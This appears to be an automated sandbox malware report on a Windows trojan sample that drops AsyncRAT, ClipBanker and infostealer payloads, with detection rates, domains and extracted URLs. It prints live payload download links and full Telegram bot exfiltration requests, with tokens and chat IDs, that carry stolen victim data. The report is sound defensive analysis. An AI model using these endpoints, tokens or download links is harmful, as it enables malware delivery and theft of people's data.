DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
xj40xovMsm.exe	71%	ReversingLabs	Win64.Trojan.Doina
xj40xovMsm.exe	37%	Virustotal		Browse
xj40xovMsm.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\ProgramData\KMSAuto\accc.exe	88%	ReversingLabs	ByteCode-MSIL.Trojan.ClipBanker
C:\ProgramData\KMSAuto\accc.exe	56%	Virustotal		Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\update2[1].pack	58%	ReversingLabs	Win64.Trojan.Generic
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\update2[1].pack	50%	Virustotal		Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\update[1].pack	54%	ReversingLabs	Win64.Trojan.TinyNuke
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\update[1].pack	55%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exe	88%	ReversingLabs	ByteCode-MSIL.Trojan.ClipBanker
C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exe	56%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	96%	ReversingLabs	ByteCode-MSIL.Backdoor.AsyncRAT
C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	74%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	96%	ReversingLabs	ByteCode-MSIL.Backdoor.AsyncRAT
C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	74%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	92%	ReversingLabs	ByteCode-MSIL.Infostealer.Echelon
C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	66%	Virustotal		Browse

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Link
edge-block-www-env.dropbox-dns.com	0%	Virustotal	Browse
igenius.org	1%	Virustotal	Browse
pastebin.com	0%	Virustotal	Browse
api.mylnikov.org	3%	Virustotal	Browse
auth.xn--conbase-sfb.xyz	10%	Virustotal	Browse
freegeoip.app	0%	Virustotal	Browse
api.ipify.org	0%	Virustotal	Browse
ip-api.com	0%	Virustotal	Browse
icanhazip.com	0%	Virustotal	Browse
hrdc.pk	3%	Virustotal	Browse
api.telegram.org	2%	Virustotal	Browse
ipbase.com	1%	Virustotal	Browse
205.12.2.0.in-addr.arpa	0%	Virustotal	Browse
www.igenius.org	0%	Virustotal	Browse
dl.dropboxusercontent.com	2%	Virustotal	Browse

Name	IP	Active	Malicious	Antivirus Detection
edge-block-www-env.dropbox-dns.com	162.125.66.15	true	false	0%, Virustotal, Browse
auth.xn--conbase-sfb.xyz	188.114.97.3	true	true	10%, Virustotal, Browse
ipbase.com	172.67.209.71	true	false	1%, Virustotal, Browse
igenius.org	192.3.140.185	true	true	1%, Virustotal, Browse
pastebin.com	172.67.19.24	true	true	0%, Virustotal, Browse
www.westnilebirdingandsafari.com	75.119.203.100	true	true
api.ipify.org	104.26.13.205	true	false	0%, Virustotal, Browse
ip-api.com	208.95.112.1	true	false	0%, Virustotal, Browse
api.mylnikov.org	172.67.196.114	true	false	3%, Virustotal, Browse
freegeoip.app	188.114.96.3	true	true	0%, Virustotal, Browse
api.telegram.org	149.154.167.220	true	true	2%, Virustotal, Browse
hrdc.pk	64.31.40.18	true	true	3%, Virustotal, Browse
icanhazip.com	104.16.184.241	true	false	0%, Virustotal, Browse
205.12.2.0.in-addr.arpa	unknown	unknown	true	0%, Virustotal, Browse
dl.dropboxusercontent.com	unknown	unknown	true	2%, Virustotal, Browse
www.igenius.org	unknown	unknown	true	0%, Virustotal, Browse

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://hrdc.pk/Server.exe	true
https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15	false
https://api.telegram.org/bot6082381502:AAEEe5dVvSMdEf-_fKUh7iRqcNun3Q5DzxM/sendMessage?chat_id=5795480469&text=%0A%20%20%F0%9F%8C%AA%20WorldWind%20Pro%20-%20Results:%0ADate:%202024-07-06%207:27:25%20am%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20user%0ACompName:%20134349%0ALanguage:%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0AAntivirus:%20Windows%20Defender.%0A%0A%20%20%F0%9F%92%BB%20Hardware:%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%201BUBDD%0ARAM:%204095MB%0AHWID:%209C8FCB6779%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x1024%0A%0A%20%20%F0%9F%93%A1%20Network:%20%0AGateway%20IP:%20192.168.2.1%0AInternal%20IP:%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system!%0AExternal%20IP:%208.46.123.33%0ABSSID:%2000:50:56:a7:21:15%0A%0A%20%20%F0%9F%92%B8%20Domains%20info:%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20Bank%20Logs%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20Crypto%20Logs%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20Freaky%20Logs%20(No%20data)%0A%0A%20%20%F0%9F%8C%90%20Logs:%0A%20%20%20%E2%88%9F%20%E2%8F%B3%20History:%209%0A%20%20%20%E2%88%9F%20%F0%9F%94%96%20Bookmarks:%205%0A%0A%20%20%F0%9F%97%83%20Software:%0A%0A%20%20%F0%9F%A7%AD%20Device:%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%20%20%F0%9F%93%84%20File%20Grabber:%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Database%20files:%206%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Documents:%2045%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Images:%2030%0A%0A%20Telegram%20Channel:%20@X_Splinter&parse_mode=Markdown&disable_web_page_preview=True	false
http://www.igenius.org/aaa.exe	true
https://api.telegram.org/bot7347450494:AAG6CMHwBd3FeRdexRASKIMPj2MuZf6S2dw/sendDocument?chat_id=212019462&caption=====%20RL%20STEALER%20====%20%0A%E2%8F%B0%20Date%20=%3E%2007/06/2024%207:28%0A%F0%9F%92%BBSystem%20=%3E%20Windows%2010%20Pro%20(64%20Bit)%0A%F0%9F%91%A4%20User%20=%3E%20user%0A%F0%9F%86%94%20PC%20=%3E%20134349%0A%F0%9F%8F%B4%20Country%20=%3E%20[United%20States]%0A%F0%9F%94%8D%20IP%20=%3E%208.46.123.33%0A%F0%9F%93%9D%20Language%20=%3E%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0A%F0%9F%94%93%20Antivirus%20=%3E%20Windows%20Defender.%0A%20====%7B%20User%20Data%20%7D====%0A%F0%9F%93%82%20FileGrabber%20=%3E%2081%0A%F0%9F%93%A6%20Telegram%20=%3E%20%E2%9D%8C%0A%F0%9F%92%B8%20Wallets%20=%3E%20%E2%9D%8C%0A%F0%9F%92%AC%20Discord%20=%3E%20%E2%9D%8C%0A%F0%9F%93%A1%20FileZilla:%20%E2%9D%8C%0A%20VimeWorld%20=%3E%20%E2%9D%8C%0A%20====%7B%20VPN%20%7D====%0A%20%E2%88%9F%20NordVPN%20=%3E%20%E2%9D%8C%0A%20%E2%88%9F%20OpenVPN%20=%3E%20%E2%9D%8C%0A%20%E2%88%9F%20ProtonVPN%20=%3E%20%E2%9D%8C%0A%20====%7B%20Browsers%20Data%20%7D====%0A%F0%9F%97%9D%20Passwords%20=%3E%200%0A%F0%9F%95%91%20History%20=%3E%209%0A%F0%9F%8D%AA%20Cookies%20=%3E%200%0A%F0%9F%93%9D%20AutoFills%20=%3E%200%0A%F0%9F%92%B3%20CC%20=%3E%200%0A%20====%7B%20Gaming%20%7D====%0A%20%F0%9F%8E%AE%20Steam%20=%3E%20%E2%9D%8C%0A%20==================%0A%20DOMAINS%20DETECTED:%0A%20-%20	false

URLs from Memory and Binaries

Name	Source	Malicious
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text	62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2005/02/sc/sct	62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp	false
https://aka.ms/odirmr	explorer.exe, 00000002.00000000.1785022693.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3146116785.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	false
https://duckduckgo.com/chrome_newtab	4BC4.tmp.Client.exe, 0000000A.00000002.2825556691.000000000404E000.00000004.00000800.00020000.00000000.sdmp, tmpBA07.tmp.dat.39.dr, tmp837E.tmp.dat.9.dr, tmp82FD.tmp.dat.9.dr, tmp2237.tmp.dat.10.dr, tmp4DC0.tmp.dat.39.dr, tmp77C6.tmp.dat.6.dr, tmp4E32.tmp.dat.10.dr, tmp767A.tmp.dat.6.dr	false
http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk	62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp	false
https://duckduckgo.com/ac/?q=	4BC4.tmp.Client.exe, 0000000A.00000002.2825556691.000000000404E000.00000004.00000800.00020000.00000000.sdmp, tmpBA07.tmp.dat.39.dr, tmp837E.tmp.dat.9.dr, tmp82FD.tmp.dat.9.dr, tmp2237.tmp.dat.10.dr, tmp4DC0.tmp.dat.39.dr, tmp77C6.tmp.dat.6.dr, tmp4E32.tmp.dat.10.dr, tmp767A.tmp.dat.6.dr	false
http://exchanger.ink/api/update2.pack6	relog.exe, 00000037.00000002.2852161070.0000023277648000.00000004.00000020.00020000.00000000.sdmp	false
http://tempuri.org/Entity/Id23ResponseD	62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002EF0000.00000004.00000800.00020000.00000000.sdmp	false
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV	explorer.exe, 00000002.00000000.1785022693.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3146116785.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false
http://tempuri.org/Entity/Id12Response	62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp	false
http://auth.xn--conbase-sfb.xyz/api/update.packhttp://auth.xn--conbase-sfb.xyz/api/update2.packhttp:	xj40xovMsm.exe, Service_{B955B2CC07A01546086603}.exe.25.dr, zbi[1].exe.0.dr, Service_Microsoft.exe.0.dr, zbi[1].exe.25.dr, Service_Skype.exe.0.dr, Service_Mozilla.exe.0.dr, Service_Adobe.exe.0.dr, {B955B2CC07A01546086603}.exe.0.dr, SystemUpdate.exe.0.dr, Service_com.adobe.dunamis.exe.0.dr, psvhost.exe.0.dr	false
https://api.msn.com:443/v1/news/Feed/Windows?	explorer.exe, 00000002.00000000.1787337320.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1785022693.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3146116785.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false
http://exchanger.ink/api/update2.pack.	relog.exe, 00000035.00000002.2752497355.0000028619D58000.00000004.00000020.00020000.00000000.sdmp	false
https://auth.xn--conbase-sfb.xyz/event.phphttps://exchanger.ink/event.phpSystemUpdate.exeTaskmgr.exe	xj40xovMsm.exe, Service_{B955B2CC07A01546086603}.exe.25.dr, zbi[1].exe.0.dr, Service_Microsoft.exe.0.dr, zbi[1].exe.25.dr, Service_Skype.exe.0.dr, Service_Mozilla.exe.0.dr, Service_Adobe.exe.0.dr, {B955B2CC07A01546086603}.exe.0.dr, SystemUpdate.exe.0.dr, Service_com.adobe.dunamis.exe.0.dr, psvhost.exe.0.dr	false
https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.	prefs.js.1.dr	false
http://tempuri.org/	62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp	false
http://tempuri.org/Entity/Id2Response	62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp	false
http://www.fontbureau.com/designers	accc.exe, 0000000B.00000002.3238247291.000000001D282000.00000004.00000800.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1	62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp	false
http://tempuri.org/Entity/Id21Response	62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap	62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp	false
http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID	62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp	false
http://tempuri.org/Entity/Id6ResponseD	62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp	false
https://cex.io/widget/light/100/btc-usd	xj40xovMsm.exe	false
https://simpleflying.com/how-do-you-become-an-air-traffic-controller/	explorer.exe, 00000002.00000000.1785022693.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3146116785.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret	62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp	false
https://g.live.com/odclientsettings/Prod.C:	edb.log.3.dr	false
https://api.ipif$	4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.0000000003633000.00000004.00000800.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue	62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp	false
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY	explorer.exe, 00000002.00000000.1785022693.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3146116785.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted	62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence	62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp	false
https://assets.dropbox.com/www/en-us/illustrations/spot/traffic-u-turn.svg	4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.0000000003073000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.000000000301F000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.000000000306B000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.0000000003023000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.000000000306F000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.0000000003067000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.0000000003077000.00000004.00000800.00020000.00000000.sdmp	false
https://auth.xn--conbase-sfb.xyz/c	xj40xovMsm.exe, 00000019.00000002.2617932750.00000229B8D50000.00000004.00000020.00020000.00000000.sdmp	false
http://tempuri.org/Entity/Id13ResponseD	62AB.tmp.build.exe, 00000014.00000002.2394089953.000000000311E000.00000004.00000800.00020000.00000000.sdmp, 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002EF0000.00000004.00000800.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2004/10/wsat/fault	62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2004/10/wsat	62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp	false
http://www.galapagosdesign.com/DPlease	accc.exe, 0000000B.00000002.3238247291.000000001D282000.00000004.00000800.00020000.00000000.sdmp	false
http://tempuri.org/Entity/Id15Response	62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp	false
http://tempuri.org/Entity/Id14V	62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000003023000.00000004.00000800.00020000.00000000.sdmp	false
http://www.zhongyicts.com.cn	accc.exe, 0000000B.00000002.3238247291.000000001D282000.00000004.00000800.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	3CBD.tmp.Installer.exe, 00000005.00000002.1941590624.00000000032C1000.00000004.00000800.00020000.00000000.sdmp, 4336.tmp.Server.exe, 00000006.00000002.3152347475.00000000024D1000.00000004.00000800.00020000.00000000.sdmp, 476D.tmp.Server.exe, 00000009.00000002.2874806986.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, accc.exe, 0000000B.00000002.3143963860.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, 5087.tmp.update.exe, 0000000E.00000002.2095704106.0000000002A98000.00000004.00000800.00020000.00000000.sdmp, 5E16.tmp.aaa.exe, 00000013.00000002.3142832732.0000000002B7B000.00000004.00000800.00020000.00000000.sdmp, 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000018.00000002.3152328073.0000000002801000.00000004.00000800.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew	62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp	false
https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6	svchost.exe, 00000003.00000003.1807789448.00000214783C2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.dr	false
http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register	62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp	false
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94	prefs.js.1.dr	false
http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey	62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp	false
https://github.com/LimerBoy/StormKitty0&fq	4336.tmp.Server.exe, 00000006.00000002.3152347475.00000000024C6000.00000004.00000800.00020000.00000000.sdmp, 476D.tmp.Server.exe, 00000009.00000002.2874806986.0000000002901000.00000004.00000800.00020000.00000000.sdmp	false
https://wns.windows.com/L	explorer.exe, 00000002.00000002.3176869488.000000000C557000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1790509509.000000000C557000.00000004.00000001.00020000.00000000.sdmp	false
https://api.ip.sb/ip	62AB.tmp.build.exe, 00000014.00000000.1945315404.0000000000A72000.00000002.00000001.01000000.00000018.sdmp, 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp, 62AB.tmp.build.exe.2.dr	false
https://api.telegram.org/bot5390757788:AAFV65Ydun9OP40g78XxI5eDbV42KqHY5mU/sendDocument?chat_id=5283	476D.tmp.Server.exe, 00000009.00000002.2874806986.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp	false
https://api.telegram.org/bot7203427100:AAE4oxY4yahcr0ruK5AXnOIUYn1d9UmUZqs/sendDocument	4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.00000000030DE000.00000004.00000800.00020000.00000000.sdmp	false
https://steamcommunity.com/profiles/ASOFTWARE	explorer.exe, 00000002.00000003.1886548235.000000000AB61000.00000004.00000001.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000000.1890364340.0000000000AC2000.00000002.00000001.01000000.00000010.sdmp, svchost.exe, 00000018.00000002.3174046241.0000000003A15000.00000004.00000800.00020000.00000000.sdmp, jqnnpe.exe, 00000027.00000000.2525684288.0000000000277000.00000002.00000001.01000000.0000001B.sdmp, jqnnpe.exe.24.dr, 4BC4.tmp.Client.exe.2.dr	false
http://tempuri.org/Entity/Id1ResponseD	62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp	false
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings	explorer.exe, 00000002.00000002.3146116785.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu	explorer.exe, 00000002.00000000.1785022693.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3146116785.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel	62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp	false
https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win	explorer.exe, 00000002.00000000.1785022693.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3146116785.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	4BC4.tmp.Client.exe, 0000000A.00000002.2825556691.000000000404E000.00000004.00000800.00020000.00000000.sdmp, tmpBA07.tmp.dat.39.dr, tmp837E.tmp.dat.9.dr, tmp82FD.tmp.dat.9.dr, tmp2237.tmp.dat.10.dr, tmp4DC0.tmp.dat.39.dr, tmp77C6.tmp.dat.6.dr, tmp4E32.tmp.dat.10.dr, tmp767A.tmp.dat.6.dr	false
http://crl.ver)	svchost.exe, 00000003.00000002.3145605822.000002147840F000.00000004.00000020.00020000.00000000.sdmp	false
https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta	prefs.js.1.dr	false
http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1	62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp	false
http://schemas.datacontract.org/2004/07/System.ServiceModel	62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp	false
http://tempuri.org/Entity/Id24Response	62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp	false
https://www.ecosia.org/newtab/	4BC4.tmp.Client.exe, 0000000A.00000002.2825556691.000000000404E000.00000004.00000800.00020000.00000000.sdmp, tmpBA07.tmp.dat.39.dr, tmp837E.tmp.dat.9.dr, tmp82FD.tmp.dat.9.dr, tmp2237.tmp.dat.10.dr, tmp4DC0.tmp.dat.39.dr, tmp77C6.tmp.dat.6.dr, tmp4E32.tmp.dat.10.dr, tmp767A.tmp.dat.6.dr	false
https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-	explorer.exe, 00000002.00000000.1785022693.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3146116785.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested	62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp	false
https://cfl.dropboxstatic.com/static/metaserver/static/css/error.css	4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.0000000003073000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.000000000301F000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.000000000306B000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.0000000003023000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.000000000306F000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.0000000003067000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.0000000003077000.00000004.00000800.00020000.00000000.sdmp	false
http://www.carterandcone.coml	accc.exe, 0000000B.00000002.3238247291.000000001D282000.00000004.00000800.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego	62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp	false
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu	explorer.exe, 00000002.00000000.1785022693.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3146116785.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false
http://tempuri.org/Entity/Id21ResponseD	62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2004/08/addressing	62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp	false
https://www.rd.com/list/polite-habits-campers-dislike/	explorer.exe, 00000002.00000000.1785022693.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3146116785.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue	62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp	false
https://api.telegram.org/bot6082381502:AAEEe5dVvSMdEf-_fKUh7iRqcNun3Q5DzxM/sendMessage?chat_id=57954	476D.tmp.Server.exe, 00000009.00000002.2874806986.000000000298A000.00000004.00000800.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse	62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp	false
https://api.telegram.org/file/bot	4336.tmp.Server.exe, 00000006.00000000.1865951347.0000000000192000.00000002.00000001.01000000.0000000E.sdmp, 476D.tmp.Server.exe.2.dr, 4336.tmp.Server.exe.2.dr	false
https://outlook.com_	explorer.exe, 00000002.00000002.3176869488.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1790509509.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	tmp5A30.tmp.dat.39.dr, tmp1126.tmp.dat.39.dr, tmpB795.tmp.dat.10.dr, tmp835D.tmp.dat.9.dr, tmp7758.tmp.dat.6.dr, tmp361D.tmp.dat.10.dr, tmp7718.tmp.dat.6.dr, tmp836E.tmp.dat.9.dr	false
http://api.telegram.org	3CBD.tmp.Installer.exe, 00000005.00000002.1941590624.00000000034B6000.00000004.00000800.00020000.00000000.sdmp, 4336.tmp.Server.exe, 00000006.00000002.3152347475.00000000025CF000.00000004.00000800.00020000.00000000.sdmp, 4336.tmp.Server.exe, 00000006.00000002.3152347475.0000000002A48000.00000004.00000800.00020000.00000000.sdmp, 476D.tmp.Server.exe, 00000009.00000002.2874806986.0000000002E92000.00000004.00000800.00020000.00000000.sdmp, 476D.tmp.Server.exe, 00000009.00000002.2874806986.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.00000000030F0000.00000004.00000800.00020000.00000000.sdmp	false
http://pastebin.com	4336.tmp.Server.exe, 00000006.00000002.3152347475.0000000002A7C000.00000004.00000800.00020000.00000000.sdmp, 476D.tmp.Server.exe, 00000009.00000002.2874806986.0000000002E7C000.00000004.00000800.00020000.00000000.sdmp	false
http://tempuri.org/Entity/Id5Response	62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns	62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp	false
